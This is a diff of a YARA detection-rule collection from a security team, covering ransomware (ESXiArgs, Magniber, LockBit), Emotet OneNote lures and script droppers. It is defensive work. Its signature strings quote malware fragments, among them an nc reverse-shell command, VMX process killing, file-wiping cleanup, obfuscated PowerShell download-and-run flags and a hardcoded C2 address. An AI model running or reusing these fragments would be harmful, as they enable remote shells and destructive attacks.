($uacbypass*) and 2 of ($note*) and $ext and $services and 2 of ($system*) } -rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE +rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23 { meta: - description = "No description has been set in the source file - SecuInfra" - author = "SECUINFRA Falcon Team" - id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84" - date = "2022-02-19" - modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14" + description = "Detects the ESXiArgs Ransomware encryption bash script" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "dafcb312-bad2-5dcc-8260-80d09e11853b" + date = "2023-02-07" + modified = "2023-02-07" + reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Bash_Feb23.yar#L1-L45" license_url = "N/A" - logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428" + logic_hash = "e9838fd86e25c434f419dcc8d37a56f4f83c38930b0558181585bbfe77cd1baf" score = 75 quality = 70 - tags = "FILE" - version = "0.1" + tags = "" + tlp = "CLEAR" strings: - $name = "PDF-Scan180220225499044" ascii wide + $bash = "#!/bin/sh" + $wait = "Waiting for task' completion..." + $comment0 = "## SSH HI" + $comment1 = "## CHANGE CONFIG" + $comment2 = "## STOP VMX" + $kill0 = "echo \"KILL VMX\"" + $kill1 = "kill -9 $(ps | grep vmx | awk '{print $2}')" + $index = "$path_to_ui/index1.html" + $ext0 = ".vmdk" + $ext1 = ".vmx" + $ext2 = ".vmxf" + $ext3 = ".vmsd" + $ext4 = ".vmsn" + $ext5 = ".vswp" + $ext6 = ".vmss" + $ext7 = ".nvram" + $ext8 = ".vmem" + $clean0 = "/bin/rm -f $CLEAN_DIR\"encrypt\" $CLEAN_DIR\"nohup.out\" $CLEAN_DIR\"index.html\" $CLEAN_DIR\"motd\" $CLEAN_DIR\"public.pem\" $CLEAN_DIR\"archieve.zip\"" + $clean1 = "/bin/echo '' > /etc/rc.local.d/local.sh" condition: - uint16(0)==0x5a4d and filesize <300KB and $name + $bash and $wait and any of ($comment*) and 2 of ($kill*) and $index and 4 of ($ext*) and 2 of ($clean*) } rule SECUINFRA_MALWARE_Plugx_USB_Delivery_LNK_Jun23 { @@ -205191,466 +207166,307 @@ rule SECUINFRA_MALWARE_Plugx_USB_Delivery_Ini_Recbin_Jun23 strings: $s_shellclassinfo = "[.ShellClassInfo]" ascii $s_IconRes = "CLSID = {645FF040-5081-101B-9F08-00AA002F954E}" ascii - $neg_LRN = "shell32.dll,-8964" ascii - - condition: - all of ($s_*) and not $neg_LRN -} -rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23 -{ - meta: - description = "Detects the ESXiArgs Ransomware encryption bash script" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "dafcb312-bad2-5dcc-8260-80d09e11853b" - date = "2023-02-07" - modified = "2023-02-07" - reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Bash_Feb23.yar#L1-L45" - license_url = "N/A" - logic_hash = "e9838fd86e25c434f419dcc8d37a56f4f83c38930b0558181585bbfe77cd1baf" - score = 75 - quality = 70 - tags = "" - tlp = "CLEAR" - - strings: - $bash = "#!/bin/sh" - $wait = "Waiting for task' completion..." - $comment0 = "## SSH HI" - $comment1 = "## CHANGE CONFIG" - $comment2 = "## STOP VMX" - $kill0 = "echo \"KILL VMX\"" - $kill1 = "kill -9 $(ps | grep vmx | awk '{print $2}')" - $index = "$path_to_ui/index1.html" - $ext0 = ".vmdk" - $ext1 = ".vmx" - $ext2 = ".vmxf" - $ext3 = ".vmsd" - $ext4 = ".vmsn" - $ext5 = ".vswp" - $ext6 = ".vmss" - $ext7 = ".nvram" - $ext8 = ".vmem" - $clean0 = "/bin/rm -f $CLEAN_DIR\"encrypt\" $CLEAN_DIR\"nohup.out\" $CLEAN_DIR\"index.html\" $CLEAN_DIR\"motd\" $CLEAN_DIR\"public.pem\" $CLEAN_DIR\"archieve.zip\"" - $clean1 = "/bin/echo '' > /etc/rc.local.d/local.sh" - - condition: - $bash and $wait and any of ($comment*) and 2 of ($kill*) and $index and 4 of ($ext*) and 2 of ($clean*) -} -rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23 -{ - meta: - description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a" - date = "2023-03-16" - modified = "2023-03-16" - reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33" - license_url = "N/A" - logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b" - score = 75 - quality = 70 - tags = "" - tlp = "CLEAR" - hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4" - hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8" - hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f" - hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2" - - strings: - $s_protected = "This document is protected" wide - $s_click = "You have to double-click \"View\" button to open" wide - $s_imgFileName = "Untitled picture.jpg" wide - $script = "language=\"VBScript\"" - $wsfExt = ".wsf" ascii wide - $GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22} - $endTmp = /rad.{5}\.tmp/ - - condition: - uint32be(0x0)==0xE4525C7B and any of ($s_*) and $script and $wsfExt and $GUIDwsf and $endTmp -} -rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23 -{ - meta: - description = "Detects the ESXiArgs Ransomware encryption bash script" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "6e2d6695-b727-5b71-bfa0-e8290e057c36" - date = "2023-02-07" - modified = "2023-02-07" - reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar#L1-L31" - license_url = "N/A" - logic_hash = "b821d1829ab4fb5eea896156a303198d6531d734196f0f947aef5d46754e6ccb" - score = 75 - quality = 70 - tags = "" - tlp = "CLEAR" - - strings: - $python = "#!/bin/python" - $desc = "This module starts debug tools" - $command0 = "server_namespace" - $command1 = "service_instance" - $command2 = "local" - $command3 = "operation_id" - $command4 = "envelope" - $cmd = "'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)" - $OpenSLPPort = "port = '427'" - $listener = "HTTPServer(('127.0.0.1', 8008), PostServer).serve_forever()" - - condition: - $python and $desc and 4 of ($command*) and $cmd and $OpenSLPPort and $listener -} -rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE -{ - meta: - description = "Detecs reversed StartUp Path. Sometimes used as obfuscation" - author = "SECUINFRA Falcon Team" - id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c" - date = "2022-02-27" - modified = "2022-02-27" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13" - license_url = "N/A" - logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc" - score = 75 - quality = 70 - tags = "FILE" - - strings: - $reverse = "\\putratS\\smargorP\\uneM" wide nocase - - condition: - filesize <200KB and $reverse -} -rule SECUINFRA_OBFUS_Powershell_Execution : FILE -{ - meta: - description = "Detects some variations of obfuscated PowerShell code to execute further PowerShell code" - author = "SECUINFRA Falcon Team" - id = "b32c2a92-599c-5916-a335-dc996dcdc1bf" - date = "2022-09-02" - modified = "2022-02-27" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L1-L17" - license_url = "N/A" - logic_hash = "b201774edc4a20a0035cd68898a785a6c2fc03fb8739d515196e428d4a88af70" - score = 75 - quality = 70 - tags = "FILE" - - strings: - $a1 = "-nop -w hiddEn -Ep bypass -Enc" ascii nocase - $a2 = "-noP -sta -w 1 -enc" ascii nocase - $b1 = "SQBFAF" - - condition: - filesize <300KB and $b1 and 1 of ($a*) -} -rule SECUINFRA_OBFUS_Powershell_Replace_Tilde : FILE -{ - meta: - description = "Detects usage of Replace to replace tilde. Often observed in obfuscation" - author = "SECUINFRA Falcon Team" - id = "59b68982-01ae-588a-9802-bb92c72342a8" - date = "2022-10-02" - modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/sample/4c391b57d604c695925938bfc10ceb4673edd64e9655759c2aead9e12b3e17cf/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L19-L32" - license_url = "N/A" - logic_hash = "a2693757f9aedc1019a94a15ae00f87af852d319aa698dadd7f9bb98128622a0" - score = 75 - quality = 70 - tags = "FILE" - - strings: - $a = ".Replace(\"~\",\"0\")" - - condition: - filesize <400KB and $a -} -rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage -{ - meta: - description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT" - author = "SECUINFRA Falcon Team" - id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747" - date = "2022-12-02" - modified = "2022-02-13" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19" - license_url = "N/A" - logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35" - score = 75 - quality = 70 - tags = "" - - strings: - $wscript = "= WScript[" - $hex_enc_str1 = "\\x63\\x72\\x65\\x61" - $hex_enc_str2 = "\\x73\\x63\\x72\\x69" - $hex_enc_str3 = "\\x71\\x75\\x69\\x74" - $hex_enc_str4 = "\\x41\\x72\\x67\\x75" - - condition: - #wscript>30 and 2 of ($hex_enc_str*) -} -rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD -{ - meta: - description = "Detect a Download to %temp% and execution with rundll32.exe" - author = "SECUINFRA Falcon Team" - id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9" - date = "2022-09-02" - modified = "2022-02-19" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14" - license_url = "N/A" - logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44" - score = 65 - quality = 70 - tags = "POWERSHELL, DOWNLOAD" - - strings: - $location = "$Env:temp" nocase - $download = "downloadfile(" nocase - $rundll = "rundll32.exe" - - condition: - $location and $download and $rundll -} -rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE -{ - meta: - description = "Detects the first stage of AgentTesla (JavaScript)" - author = "SECUINFRA Falcon Team" - id = "0a098f27-8dbc-5749-9a0d-fd0198184c7a" - date = "2022-02-27" - modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/sample/bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/agent_tesla.yar#L1-L18" - license_url = "N/A" - hash = "bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec" - logic_hash = "7c21f80a02aa161ffb2edf47aff796f22aff2a563abcb0097cc86371c05e516d" - score = 75 - quality = 45 - tags = "JAVASCRIPT, AGENTTESLA, OBFUSCATORIO, FILE" - - strings: - $mz = "TVq" - $a1 = ".jar" - $a2 = "bin.base64" - $a3 = "appdata" - $a4 = "skype.exe" + $neg_LRN = "shell32.dll,-8964" ascii condition: - filesize <500KB and $mz and 3 of ($a*) + all of ($s_*) and not $neg_LRN } -rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE +rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE { meta: description = "No description has been set in the source file - SecuInfra" author = "SECUINFRA Falcon Team" - id = "5296667a-2932-597e-8f49-b7fa755cb387" - date = "2022-02-27" + id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84" + date = "2022-02-19" modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23" + reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14" license_url = "N/A" - logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb" + logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428" score = 75 quality = 70 - tags = "VBS, NJRAT, DROPPER, FILE" + tags = "FILE" + version = "0.1" strings: - $a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide - $a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide - $b1 = "CreateObject(\"WScript.Shell\")" wide - $b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide - $b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide - $b4 = "& DGRP & NvWt & DGRP &" wide - $b5 = "= ogidoC$" wide + $name = "PDF-Scan180220225499044" ascii wide condition: - filesize <300KB and ((1 of ($a*)) or (2 of ($b*))) + uint16(0)==0x5a4d and filesize <300KB and $name } -rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE +rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23 { meta: - description = "Detects the first stage of WSHRAT as obfuscated JavaScript" - author = "SECUINFRA Falcon Team" - id = "3bd363dc-3183-595e-931b-668eb17495f5" - date = "2022-11-02" - modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/sample/ad24ae27346d930e75283b10d4b949a4986c18dbd5872a91f073334a08169a14/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/wshrat.yar#L1-L18" + description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a" + date = "2023-03-16" + modified = "2023-03-16" + reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33" license_url = "N/A" - hash = "793eff1b2039727e76fdd04300d44fc6" - logic_hash = "1390929d06bd1259dbab425fd4e953119f632be460f57756a0c226e9f510d75a" + logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b" score = 75 quality = 70 - tags = "FILE" + tags = "" + tlp = "CLEAR" + hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4" + hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8" + hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f" + hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2" strings: - $a1 = "'var {0} = WS{1}teObject(\"ado{2}am\");" - $b1 = "String[\"prototype\"]" - $b2 = "this.replace(" - $b3 = "Array.prototype" + $s_protected = "This document is protected" wide + $s_click = "You have to double-click \"View\" button to open" wide + $s_imgFileName = "Untitled picture.jpg" wide + $script = "language=\"VBScript\"" + $wsfExt = ".wsf" ascii wide + $GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22} + $endTmp = /rad.{5}\.tmp/ condition: - filesize <1500KB and $a1 and #b3>3 and #b1>2 and $b2 + uint32be(0x0)==0xE4525C7B and any of ($s_*) and $script and $wsfExt and $GUIDwsf and $endTmp } -rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE +rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE { meta: - description = "No description has been set in the source file - SecuInfra" + description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method" author = "SECUINFRA Falcon Team" - id = "a07f80e4-56c3-5b75-be64-648bc1fde964" - date = "2022-02-19" - modified = "2022-02-27" - reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19" + id = "6d5a937d-ac31-5c59-8e93-3fadc772d132" + date = "2023-01-13" + modified = "2023-01-13" + reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24" license_url = "N/A" - logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed" + hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6" + logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30" score = 75 - quality = 20 - tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE" - version = "0.1" + quality = 68 + tags = "FILE" + tlp = "CLEAR" strings: - $a1 = "$$$" - $a2 = "microsoft.xmldom" - $a3 = "eval" - $a4 = "join(\"\")" + $magic = {43 44 30 30 31} + $tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39} + $msiMagic = {D0 CF 11 E0 A1 B1 1A E1} + $dosString = "!This program cannot be run in DOS mode" ascii + $lnkMagic = {4C 00 00 00} condition: - ( uint16(0)==0x7566 or uint16(0)==0x6176 or uint16(0)==0x0a0d or uint16(0)==0x660a) and filesize <60KB and all of ($a*) + filesize >200KB and filesize <800KB and all of them } -rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE +rule SECUINFRA_RANSOM_Magniber_LNK_Jan23 { meta: - description = "Detects unknown HTA Dropper" + description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method" author = "SECUINFRA Falcon Team" - id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9" - date = "2022-10-02" - modified = "2022-02-19" - reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21" + id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91" + date = "2023-01-13" + modified = "2023-01-13" + reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18" license_url = "N/A" - hash = "1749f4127bba3f7204710286b1252e14" - logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75" + hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c" + logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5" score = 75 - quality = 43 - tags = "DROPPER, HTA, FILE" + quality = 70 + tags = "" + tlp = "CLEAR" strings: - $a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >" - $a2 = "Function XmlTime(t)" - $a3 = "C:\\ProgramData\\" - $a4 = "wscript.exe" - $a5 = "Array" nocase - $b = "chr" nocase + $netbiosName = "victim1" ascii fullword + $macAddress = {00 0C 29 07 E1 6D} condition: - filesize <70KB and all of ($a*) and #b>7 + uint32be(0x0)==0x4C000000 and all of them } -rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE +import "math" +import "pe" +import "console" + +rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE { meta: - description = "Family was taken from VirusTotal" + description = "Detects the packer used by Lockbit Black (Version 3)" author = "SECUINFRA Falcon Team" - id = "7e2ab9db-142c-5dee-92b7-4a70d747c540" - date = "2022-02-18" - modified = "2022-02-18" - reference = "https://bazaar.abuse.ch/sample/c8a8fea3cbe08cd97e56a0e0dbc59a892f8ab1ff3b5217ca3c9b326eeee6ca66/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/valyria.yar#L1-L23" + id = "f4c1a12b-eb89-5a46-97a9-f0207ca1bbde" + date = "2022-07-04" + modified = "2022-07-04" + reference = "https://twitter.com/vxunderground/status/1543661557883740161" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Lockbit_Black_Packer.yar#L5-L40" license_url = "N/A" - logic_hash = "94643123a4be26c818d43a77b907edf8651d306463f4df750db67cef790f10eb" + logic_hash = "cde7f5374b97b2462cfd951994b6bb3ef0962e1be71253e25ca14d53c3d3d615" score = 75 - quality = 70 - tags = "JAVASCRIPT, VBS, VALYRIA, FILE" + quality = 45 + tags = "RANSOMWARE, FILE" + tlp = "WHITE" + hash0 = "80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce" + hash1 = "506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51" + hash2 = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee" strings: - $a1 = "<script language=\"vbscript\">" - $a2 = "<script language=\"javascript\">" - $b1 = "window.resizeTo(0,0);" - $b2 = ".Environment" - $b3 = ".item().Name" - $b4 = "v4.0.30319" - $b5 = "v2.0.50727" - $c1 = "Content Writing.docx" - $c2 = "eval" + $sectionname0 = ".rdata$zzzdbg" ascii + $sectionname1 = ".xyz" ascii fullword + $check0 = {3d 75 80 91 76 ?? ?? 3d 1b a4 04 00 ?? ?? 3d 9b b4 84 0b} + $check1 = {3d 75 ba 0e 64} + $asciiCalc = {66 83 f8 41 ?? ?? 66 83 f8 46 ?? ?? 66 83 e8 37} condition: - filesize <600KB and all of ($a*) and 3 of ($b*) and 1 of ($c*) + uint16(0)==0x5a4d and filesize >111KB and filesize <270KB and all of ($sectionname*) and any of ($check*) and $asciiCalc and for any i in (0..pe.number_of_sections-1) : (math.entropy(pe.sections[i].raw_data_offset,pe.sections[i].raw_data_size)>7.9 and (pe.sections[i].name==".text" or pe.sections[i].name==".data" or pe.sections[i].name==".pdata") and console.log("High Entropy section found:",pe.sections[i].name)) } -rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE +rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23 { meta: - description = "No description has been set in the source file - SecuInfra" - author = "SECUINFRA Falcon Team" - id = "80f84c2f-7af0-55c1-bc06-d605beae3e33" - date = "2022-02-21" - modified = "2022-02-21" - reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18" + description = "Detects the ESXiArgs Ransomware encryption bash script" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "6e2d6695-b727-5b71-bfa0-e8290e057c36" + date = "2023-02-07" + modified = "2023-02-07" + reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar#L1-L31" license_url = "N/A" - logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358" + logic_hash = "b821d1829ab4fb5eea896156a303198d6531d734196f0f947aef5d46754e6ccb" score = 75 quality = 70 - tags = "FILE" + tags = "" + tlp = "CLEAR" strings: - $a1 = "http://3.145.46.6/" - $b1 = "Const HIDDEN_WINDOW = 0" - $b2 = "GetObject(\"winmgmts:\\\\" - $c = "replace(" + $python = "#!/bin/python" + $desc = "This module starts debug tools" + $command0 = "server_namespace" + $command1 = "service_instance" + $command2 = "local" + $command3 = "operation_id" + $command4 = "envelope" + $cmd = "'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)" + $OpenSLPPort = "port = '427'" + $listener = "HTTPServer(('127.0.0.1', 8008), PostServer).serve_forever()" condition: - filesize <10KB and ($a1 or ( all of ($b*) and #c>10)) + $python and $desc and 4 of ($command*) and $cmd and $OpenSLPPort and $listener } -import "pe" +rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23 +{ + meta: + description = "Detects suspicious Microsoft OneNote files used to deliver Malware" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "ebf02a11-6f53-573d-bd7a-9948cef9fb3a" + date = "2023-01-19" + modified = "2023-01-19" + reference = "https://twitter.com/James_inthe_box/status/1615421130877329409" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/MALWARE_OneNote_Delivery_Jan23.yar#L1-L56" + license_url = "N/A" + logic_hash = "08c38eedf500fd1a0224e396b41aebb8ac82b3705321ca798ac1007ea34366e1" + score = 65 + quality = 66 + tags = "" + tlp = "CLEAR" + hash0 = "18af397a27e58afb901c92f37569d48e3372cf073915723e4e73d44537bcf54d" + hash1 = "de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf" + hash2 = "bfc979c0146d792283f825f99772370f6ff294dfb5b1e056943696aee9bc9f7b" + hash3 = "e0d9f2a72d64108a93e0cfd8066c04ed8eabe2ed43b80b3f589b9b21e7f9a488" + hash4 = "3f00a56cbf9a0e59309f395a6a0b3457c7675a657b3e091d1a9440bd17963f59" -rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE + strings: + $hta = "hta:application" nocase + $script1 = "type=\"text/vbscript\"" + $script2 = "language=\"VBScript\"" + $powershell = "powershell" nocase + $startProc = "Start-Process -Filepath" + $webReq = "Invoke-WebRequest -Uri" + $bitsadmin = "bitsadmin /transfer" + $wscript = "WScript.Shell" nocase + $autoOpen = "Sub AutoOpen()" + $root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")" + $wsfExt = ".wsf" ascii wide + $vbsExt = ".vbs" ascii wide + $cmd = "cmd /c" nocase + $batch = "@echo off" + $batExt = ".bat" ascii wide + $delExit = "(goto) 2>nul & del \"%~f0\"..exit /b" + $dosString = "!This program cannot be run in DOS mode" + $exeExt = ".exe" ascii wide + $imageFile = "button_click-to-view-document.png" wide + $click = "click to view document" nocase wide + $path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide + $path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide + $path3 = "C:\\Users\\julien.galleron\\Downloads" wide + + 